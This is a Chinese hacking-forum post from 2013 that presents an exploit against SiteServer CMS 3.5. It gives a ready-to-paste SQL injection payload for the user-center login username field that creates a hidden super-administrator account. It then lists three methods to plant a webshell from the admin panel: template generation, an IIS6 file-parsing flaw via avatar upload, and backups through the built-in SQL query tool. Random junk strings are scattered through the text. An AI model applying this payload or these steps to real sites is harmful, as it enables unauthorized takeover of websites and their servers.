找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2863|回复: 0
打印 上一主题 下一主题

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:40:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版. Q, n4 @# _3 g$ R- }
stieserver官网:www.siteserver.cn) X; q6 ~6 ]& f% D
EXP:
  E1 {7 u" j# `0 ~/ y; E. N直接访问UserCenter/login.aspx' \$ q" G2 G; F" |9 _$ d) M1 @8 f
用户名处输入:& m2 n: g+ q6 R2 `( m9 u& a1 _

9 I  ~" i6 n7 n3 u" `2 X123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–& Q1 R1 I6 ^- l" I+ T+ t! ?
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
  w7 b. T$ a# m. k4 M之后再访问后台SiteServer/login.aspx用插入的用户登陆
( v- f1 _" a1 r2 c后台拿webshell的三种方法:5 `. T* B. e9 h/ \( I
一、
- }1 P7 @3 K8 l# H+ V站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
! e  Y) g1 p- ~4 N* @+ {  i二、
' S, ~, h- N( x- V  C成员权限-》添加用户-》用户名为:1.asp
& M/ v, ^% \; T: J, T% Bhttp://127.0.0.1/usercenter/7 s4 }: S6 `9 {
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell6 U3 z; z% F! Z/ g3 Z; O8 J2 Y* J
(ps:后台添加用户时不会验证是否含有非法字符); k: M' F0 Q/ g" F- ^6 k6 S$ e" C
三、, N; L& V7 P% c* q; K, g8 t
系统工具-》实用工具-》机器参数查看! A/ K2 J7 D/ C  |
可以看到数据库类型、名称,WEB路径( k5 J8 p) ^, z: g
系统工具-》数据库工具-》SQL语句查询* _- v" b# [# y( h0 O
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表